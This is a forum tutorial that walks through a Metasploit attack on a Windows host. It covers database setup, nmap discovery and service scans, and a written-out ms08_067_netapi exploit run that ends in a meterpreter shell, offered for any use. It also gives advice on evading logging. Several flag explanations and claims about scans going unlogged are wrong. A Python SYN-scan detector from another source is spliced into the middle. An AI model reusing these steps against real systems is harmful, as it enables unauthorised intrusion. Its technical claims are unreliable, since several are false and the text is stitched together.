Using metasploit and its exploits

Welcome again to another ultra noob edition production. :) I know everyone likes colors but I am indeed just going to be very straightforward since I'm in happy land right now.

NOTE: I am not responsible for anything you do with this information. It is for educational purposes only.


First off we are going to set up Metasploit with PostgreSQL (which I use, but you can also use sqlite3 or MySQL). These Structured Query Language (SQL) databases are what hold the information about a target after scans and such.


For those of you using Windows, you can go here.


For this instalment of ultra noob edition I will be using Blackbuntu. You can download Blackbuntu here!

To download BackTrack you can go here!

So once you have PostgreSQL and its daemon running, you need to run the following commands to create a user and password for your Metasploit database.


In Blackbuntu and BackTrack 5 you will use the command

Code:
service postgresql start

In BackTrack 4r2 and below use:

Code:
/etc/init.d/postgresql-8.3 start

Note: you might have postgresql-8.4 as I do, so replace the 3 with a 4.
Code:
sudo su postgres -c psql
  -- now at the psql prompt: set the database password for the postgres role
  ALTER USER postgres WITH PASSWORD 'your password';

  \q

  # back in the shell: clear the old system password for the postgres account and set a new one
  sudo passwd -d postgres
  sudo su postgres -c passwd

Note: if using BackTrack, ignore the sudo commands as you are already root.

What this does is set up the postgres user with whatever password you choose.


Now, once inside Metasploit, to create or connect to the PostgreSQL database you use the following command:

Code:
db_connect postgres:yourpassword@127.0.0.1/msf3

[Image: metasploit1.png]

This will create a PostgreSQL database called msf3 if you haven't already; if you have, it will just connect to it (as shown in mine).

This is where the show really gets going.
Now you have two options: you can scan your network using outside tools to find the IP addresses, or use an nmap ping scan.

To run a ping scan with nmap, use it through the db_nmap command, because that automatically adds the hosts it finds on the network to your new PostgreSQL database.

Code:
db_nmap -Pn -v 192.168.1.1-255

[Image: metasploit2.png]

Now the -Pn argument tells nmap to run a ping scan on port 80 to decide which hosts are up, and those hosts are added to your database, while the -v option tells nmap to run in verbose mode, giving you more detailed feedback while the scan is running.

Now after you have a list of live hosts you can run nmap in a new mode.

Code:
db_nmap -sS -sV -sU -n -O -v 192.168.1.4

[Image: metasploit3.png]

NOTE: VERY IMPORTANT. RUNNING THE -sS COMMAND VS THE -sT COMMAND.

THE -sT COMMAND COMPLETES A FULL TCP CONNECTION WHICH GETS LOGGED BY THE REMOTE HOST. TO PREVENT THIS RUNNING A STEALTH SYN SCAN WITH THE -sS COMMAND IS THE BEST OPTION. I HAVE STATED THIS IN OTHER TUTS ABOUT NMAP BUT TO STAY ANON YOU NEED TO DO THIS.

Now I run the IP 192.168.1.4 because that is what is currently on my network.

The -sS option runs a stealth SYN scan, which does not create a full TCP connection and allows you to continue unlogged. The -sV scan will tell you what services are running on a certain port, which will come into play when selecting an exploit to use.
The -sU option runs a UDP port scan against the target, and since there is no reply to UDP packets they never get logged in the first place. The -O scan runs an OS scan against the target using TCP fingerprinting to tell you the operating system of the target machine; this will also come into play when selecting an exploit. The -n option tells nmap not to run a -Pn or ping scan against the target, as those get logged, and since you have already done that once you wouldn't want to do it again.
And again the -v option runs nmap in verbose mode, which lets you see more of what's going on behind the scenes and helps you better understand what is happening.
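A defender's view of the scan described above, added here as an example that is not part of the original post: a host that logs new inbound TCP connection attempts records each SYN probe of a half-open scan as its own line. The Python below runs over constructed, simplified netfilter-style LOG lines (sample data, not real captures) and reports a source that sent bare SYNs to many ports of one host without ever completing a handshake, while the ordinary client that completes one is not flagged.

```python
import re
from collections import defaultdict

# Constructed, simplified netfilter-style LOG lines (sample data, not from the original post).
# Each bare SYN probe of a half-open scan lands as its own line, so the scanning
# source is visible to the logging host even though no connection is completed.
SAMPLE_LOG = """\
kernel: IN=eth0 SRC=192.168.1.3 DST=192.168.1.4 PROTO=TCP SPT=41001 DPT=22 WINDOW=1024 RES=0x00 SYN URGP=0
kernel: IN=eth0 SRC=192.168.1.3 DST=192.168.1.4 PROTO=TCP SPT=41002 DPT=80 WINDOW=1024 RES=0x00 SYN URGP=0
kernel: IN=eth0 SRC=192.168.1.3 DST=192.168.1.4 PROTO=TCP SPT=41003 DPT=135 WINDOW=1024 RES=0x00 SYN URGP=0
kernel: IN=eth0 SRC=192.168.1.3 DST=192.168.1.4 PROTO=TCP SPT=41004 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0
kernel: IN=eth0 SRC=192.168.1.3 DST=192.168.1.4 PROTO=TCP SPT=41005 DPT=445 WINDOW=1024 RES=0x00 SYN URGP=0
kernel: IN=eth0 SRC=192.168.1.20 DST=192.168.1.4 PROTO=TCP SPT=50123 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
kernel: IN=eth0 SRC=192.168.1.20 DST=192.168.1.4 PROTO=TCP SPT=50123 DPT=445 WINDOW=8192 RES=0x00 ACK URGP=0
kernel: IN=eth0 SRC=192.168.1.20 DST=192.168.1.4 PROTO=TCP SPT=50123 DPT=445 WINDOW=8192 RES=0x00 ACK PSH URGP=0
"""

FIELD_RE = re.compile(r"SRC=(\S+) DST=(\S+) PROTO=TCP SPT=\d+ DPT=(\d+)")
TCP_FLAGS = {"URG", "ACK", "PSH", "RST", "SYN", "FIN"}


def parse_line(line):
    """Return (src, dst, dport, flags) for a TCP log line, or None if it is not one."""
    m = FIELD_RE.search(line)
    if not m:
        return None
    src, dst, dport = m.groups()
    flags = {tok for tok in line.split() if tok in TCP_FLAGS}
    return src, dst, int(dport), flags


def flag_syn_scanners(log_text, min_ports=5):
    """Map 'src->dst' to the sorted ports a source probed with bare SYNs, reported only
    when at least min_ports distinct ports were hit and that pair never sent an ACK."""
    syn_ports = defaultdict(set)
    completed = set()
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, dst, dport, flags = parsed
        if flags == {"SYN"}:
            syn_ports[(src, dst)].add(dport)
        elif "ACK" in flags:
            completed.add((src, dst))  # a handshake progressed: normal client traffic
    return {f"{src}->{dst}": sorted(ports)
            for (src, dst), ports in syn_ports.items()
            if len(ports) >= min_ports and (src, dst) not in completed}
```

On the sample above only 192.168.1.3 is reported, with the five ports it probed; the min_ports threshold is what you tune to your own network's noise.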

Now once you have a list of open ports you can begin to choose your exploit based on port and operating system. For this exercise I chose the windows/smb/ms08_067_netapi exploit.


Now, since port 445 is open, I will attempt to run the ms08_067_netapi exploit against the target. So with Metasploit open we will run

Code:
use windows/smb/ms08_067_netapi
set payload windows/bind_tcp
set rhost 192.168.1.4
set lhost 192.168.1.3
set lport 5150
check

NOTE: Run the show options command to display what information is required for the exploit to work properly.

[Image: metasploit4.png]


Now these commands in Metasploit will first set the exploit to use as the windows/smb/ms08_067_netapi exploit.

The second sets Metasploit to use a bind shell over the TCP protocol.

The third sets the remote host to our target IP. The fourth sets the local host to our IP, and the fifth sets the local port to the one we want to listen on.

Running the check command will tell us if the target is vulnerable or not.

And as you can see, it is. So now we will run the exploit command:

Code:
exploit

[Image: metasploit5.png]

From there meterpreter will open. You can go here for all the meterpreter commands.

Now you're in.... All you need to do is whatever you want. LOL

This Has been another ultra noob edition tutorial.

References

http://www.backtrack-linux.org/forums/ba...resql.html

http://hackforums.net/showthread.php?tid=970352


If I missed a ref or something let me know. I will fix it immediately.

P.S. Will be adding things and command explanations as necessary; just P.M. me for any help or explanations.

Also would very much appreciate feedback on what I could improve within the tut and whether or not it was enjoyed/helpful.

P.P.S. Am still making the cracking WPA with aircrack tutorial.... pretty much was just too lazy to do it recently as I am going to be a father... :)


Really? No feedback or anything about this post? That's disappointing.. if I can't get more than a single thank you I might as well stop making tuts